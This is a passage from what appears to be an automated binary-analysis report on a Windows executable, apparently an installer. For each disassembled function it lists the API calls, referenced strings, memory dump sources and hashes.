                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wsprintf$_memsetlstrlen
                                                                                                                                                                          • String ID: %s%s$ftp://$http://$https://
                                                                                                                                                                          • API String ID: 114250505-620530764
                                                                                                                                                                          • Opcode ID: 58f1ece3e86ed6cdefbf1f32484111b66c7f71426f9b73eda306e4f8c1b5e2d3
                                                                                                                                                                          • Instruction ID: fabe39ad54b87a79b382aaac31897d8ddb29fbc4b9f0f0c7b59bd71dd89ad4fb
                                                                                                                                                                          • Opcode Fuzzy Hash: 58f1ece3e86ed6cdefbf1f32484111b66c7f71426f9b73eda306e4f8c1b5e2d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 34210C36940705AADB00AFA5CC86DDF7778EF45750B50402BF909FB181E6789D80C79C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00403C80, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00404C70: GetLastError.KERNEL32(00000001,749AD5B0,CC858012,?,74B04D40,?,?,00471888,000000FF,HsG,00403CD4), ref: 00404CE4
                                                                                                                                                                            • Part of subcall function 00404C70: SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 00404D32
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00403CE1
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403CFF
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403D0C
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00403D36
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00403D45
                                                                                                                                                                          • SetLastError.KERNEL32(?,00000000,00000000,000000FF), ref: 00403D9F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2425351278-815662401
                                                                                                                                                                          • Opcode ID: bcde55c539f5cb98da283ca6dcf2819adc36ab9a9a3df555dbc32a5473944794
                                                                                                                                                                          • Instruction ID: 7833fdf33f88805c2daa6f41fbdd71a98810f8c70320815feea399d870666dea
                                                                                                                                                                          • Opcode Fuzzy Hash: bcde55c539f5cb98da283ca6dcf2819adc36ab9a9a3df555dbc32a5473944794
                                                                                                                                                                          • Instruction Fuzzy Hash: EA315771508741AFD700DF29C984B1ABBE8FF88318F504A2EF458976A1D7B5E805CF8A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041BCD0, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 81registrystringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharNextW.USER32(?,tempdisk1folder,?,00000000), ref: 0041BCF6
                                                                                                                                                                          • lstrcmpW.KERNEL32(00000000,%IS_T%,?,tempdisk1folder,?,00000000), ref: 0041BD04
                                                                                                                                                                          • _memset.LIBCMT ref: 0041BD67
                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(?,00000000,?,?), ref: 0041BDB4
                                                                                                                                                                            • Part of subcall function 004382A3: lstrlenW.KERNEL32(?,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?,00000218,0041C6E4,?,0000043C), ref: 004382AC
                                                                                                                                                                            • Part of subcall function 004382A3: lstrcpyW.KERNEL32 ref: 004382D3
                                                                                                                                                                            • Part of subcall function 004382A3: lstrcpyW.KERNEL32 ref: 004382E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpy$CharDeleteNextValue_memsetlstrcmplstrlen
                                                                                                                                                                          • String ID: %$%IS_T%$Software\Microsoft\Windows\CurrentVersion$tempdisk1folder
                                                                                                                                                                          • API String ID: 1514787324-1686409532
                                                                                                                                                                          • Opcode ID: 4b4e53fd542973aba0f7be9f1489c8f4db82d7abc0c53041a7d4b394e740c3b7
                                                                                                                                                                          • Instruction ID: 0e35a17c36fbe4e4707e3ae2470e6d5fed16be83a0bf3acd8eefc6bda252b369
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b4e53fd542973aba0f7be9f1489c8f4db82d7abc0c53041a7d4b394e740c3b7
                                                                                                                                                                          • Instruction Fuzzy Hash: 7131C230940658AADB28EB51CCD9BEE7678AF04348F0001EFB409B21E1DF785FC58E99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00458B08, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73libraryregistryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00458B0F
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00459249: __EH_prolog3.LIBCMT ref: 00459250
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00458B7E
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00458B8F
                                                                                                                                                                          • RegOverridePredefKey.ADVAPI32(80000000,00000000), ref: 00458BE2
                                                                                                                                                                            • Part of subcall function 00458F45: GetVersionExW.KERNEL32(?), ref: 00458F69
                                                                                                                                                                            • Part of subcall function 00454E9F: RegOverridePredefKey.ADVAPI32(80000000,?), ref: 00454ED7
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00458BAA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3Last$OverridePredef$AddressLibraryLoadProcVersion
                                                                                                                                                                          • String ID: DllRegisterServer$DllUnregisterServer$HsG
                                                                                                                                                                          • API String ID: 916470829-3778953661
                                                                                                                                                                          • Opcode ID: e1f8931952093f34fe6a29724dca1a251a437c3ec3e20ad3f639dfa12bf480b1
                                                                                                                                                                          • Instruction ID: 8d5360c3148e746e4eb84ea5d0da08369e5c0f33e7d49faedf27595deeded794
                                                                                                                                                                          • Opcode Fuzzy Hash: e1f8931952093f34fe6a29724dca1a251a437c3ec3e20ad3f639dfa12bf480b1
                                                                                                                                                                          • Instruction Fuzzy Hash: 9521B460904245AAEB00EFB5C8157AE3B68AB11309F50846FBC59AA283DF78964DC719
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041C38A, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0041C391
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,0041C35C,?,00000000,?,00000001), ref: 0041C3B3
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 0041C3EE
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0041C40F
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000037,00000000,00000000,00000000), ref: 0041C436
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 0041C444
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$ByteCharMultiWide$H_prolog3
                                                                                                                                                                          • String ID: HsG$m<H
                                                                                                                                                                          • API String ID: 1573742327-3913731857
                                                                                                                                                                          • Opcode ID: 2eb86a0f909ee0a4fbea53a7bd0c4ed67e9ebd44417d8eb743df5a9b25001909
                                                                                                                                                                          • Instruction ID: 520e5987ffc208b54da3ed1a303307f8dff03029e77857e9b0c388558b2bc5c2
                                                                                                                                                                          • Opcode Fuzzy Hash: 2eb86a0f909ee0a4fbea53a7bd0c4ed67e9ebd44417d8eb743df5a9b25001909
                                                                                                                                                                          • Instruction Fuzzy Hash: 15217870504605EFDB10CF68D948B99BBF5FF08304F11816EF9499B6A1C374AA94CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00456347, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 57libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,FindNextFileW,00000000,00000000), ref: 0045636C
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00456373
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,FindNextFileA), ref: 004563A9
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004563B0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: FindNextFileA$FindNextFileW$kernel32.dll$hE
                                                                                                                                                                          • API String ID: 1646373207-2121118663
                                                                                                                                                                          • Opcode ID: aa2722dac122cd8750b97d7bcf507d6cee1a5f10d67d6f0523148c5f646c930a
                                                                                                                                                                          • Instruction ID: 7a136b3481172b3f0d0a27c7db2885ae56c4f78afd8c083977c64a7b4bf7837f
                                                                                                                                                                          • Opcode Fuzzy Hash: aa2722dac122cd8750b97d7bcf507d6cee1a5f10d67d6f0523148c5f646c930a
                                                                                                                                                                          • Instruction Fuzzy Hash: E9118632600525AB8B10FFA49D49ABF73E89B48756B55006AFC09D3282DB78DE488B59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004561BD, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004561C7
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,FindFirstFileW,00000254,00455824), ref: 004561E3
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004561E6
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,FindFirstFileA), ref: 00456226
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00456229
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc$H_prolog3_
                                                                                                                                                                          • String ID: FindFirstFileA$FindFirstFileW$kernel32.dll
                                                                                                                                                                          • API String ID: 762132516-163559883
                                                                                                                                                                          • Opcode ID: 3093ea68332e9f22e1d32dae94c75286150bfc6223ac29f77a4d3dbb62b0d123
                                                                                                                                                                          • Instruction ID: 988da93d2f6e90c525e9d2e1c97fe73c196047658258afb6c425bcd9891aaad1
                                                                                                                                                                          • Opcode Fuzzy Hash: 3093ea68332e9f22e1d32dae94c75286150bfc6223ac29f77a4d3dbb62b0d123
                                                                                                                                                                          • Instruction Fuzzy Hash: 54110831904124ABCB10FB69CC4DAAE3764AB44765F9502AAFC18A71C1DF389E49CB88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004555A0, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFileW,?,00000000,HsG,00438CE8,?,?,00000000,?,HsG,?,?,?,00000000,0045611E), ref: 004555B6
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004555B9
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFileA,?,00000000,HsG,00438CE8,?,?,00000000,?,HsG,?,?,?,00000000,0045611E), ref: 004555EE
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004555F1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: CreateFileA$CreateFileW$HsG$kernel32.dll
                                                                                                                                                                          • API String ID: 1646373207-726590994
                                                                                                                                                                          • Opcode ID: 78f60f67d669c6fe22655b0590b2212f565ae337478ebddb22a5579241ec4567
                                                                                                                                                                          • Instruction ID: 877a3ee708e1406f69b3fa5c016f0a783bed4bc64dfb2203590629ed6211b060
                                                                                                                                                                          • Opcode Fuzzy Hash: 78f60f67d669c6fe22655b0590b2212f565ae337478ebddb22a5579241ec4567
                                                                                                                                                                          • Instruction Fuzzy Hash: 1501407250060ABBCF115FA4DC54CBF3F2AFF08765714451AFE1956161CB3AC960DBA8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00455527, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0045552E
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateDirectoryW,00000000,00455D7E), ref: 0045554B
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0045554E
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateDirectoryA), ref: 00455573
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00455576
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc$H_prolog3
                                                                                                                                                                          • String ID: CreateDirectoryA$CreateDirectoryW$kernel32.dll
                                                                                                                                                                          • API String ID: 1623054726-2917578371
                                                                                                                                                                          • Opcode ID: 14105ab41adff66b7a10bd5c678ae01bb1f43cfe5929931af479134205201f8d
                                                                                                                                                                          • Instruction ID: bb23eda88fbda8d4adcde135058bda2a16c2cd5ca5d101f142e661b59f5a49e7
                                                                                                                                                                          • Opcode Fuzzy Hash: 14105ab41adff66b7a10bd5c678ae01bb1f43cfe5929931af479134205201f8d
                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF0A471200608BBCB10AF61CC99DAF3665EB44B51B91892EF809A7242DF7CDA44C7AC
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00459176, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 39libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0045917D
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,SetFileAttributesW,00000000,004556F5,0000000A,00000000), ref: 00459197
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0045919A
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,SetFileAttributesA), ref: 004591C1
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004591C4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc$H_prolog3
                                                                                                                                                                          • String ID: SetFileAttributesA$SetFileAttributesW$kernel32.dll
                                                                                                                                                                          • API String ID: 1623054726-3589348009
                                                                                                                                                                          • Opcode ID: 23a29bf3a17832be601d29b7d167d04d1e6c8ed2072776756cb96b300562f417
                                                                                                                                                                          • Instruction ID: b556d46341c89ed7476d63b12a0adfd85d238b4bbed302006bbe537b1fc950c4
                                                                                                                                                                          • Opcode Fuzzy Hash: 23a29bf3a17832be601d29b7d167d04d1e6c8ed2072776756cb96b300562f417
                                                                                                                                                                          • Instruction Fuzzy Hash: FEF08131200619FBCB107F65CC09D9E3A65AF50751B96852BFC09A7251DF78DA44CB9C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00456505, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 37libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0045650C
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetFileAttributesW,00000000,004557A3), ref: 00456526
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00456529
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetFileAttributesA), ref: 0045654D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00456550
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc$H_prolog3
                                                                                                                                                                          • String ID: GetFileAttributesA$GetFileAttributesW$kernel32.dll
                                                                                                                                                                          • API String ID: 1623054726-1399581607
                                                                                                                                                                          • Opcode ID: 4a076615c5b710e15969690bd60be9ee6e956a53f8ecada110a62555807d5cb1
                                                                                                                                                                          • Instruction ID: 579ed438ac276a9961a9abae618d24a7f6f941623fdac6bb2ddf1edbb4c218b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 4a076615c5b710e15969690bd60be9ee6e956a53f8ecada110a62555807d5cb1
                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF0C871600205B7CB10BF71CC09A9E3654AF80B51792852FF809A7241DF7CC605C79C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043E26D, Relevance: 13.6, APIs: 9, Instructions: 147fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043E277
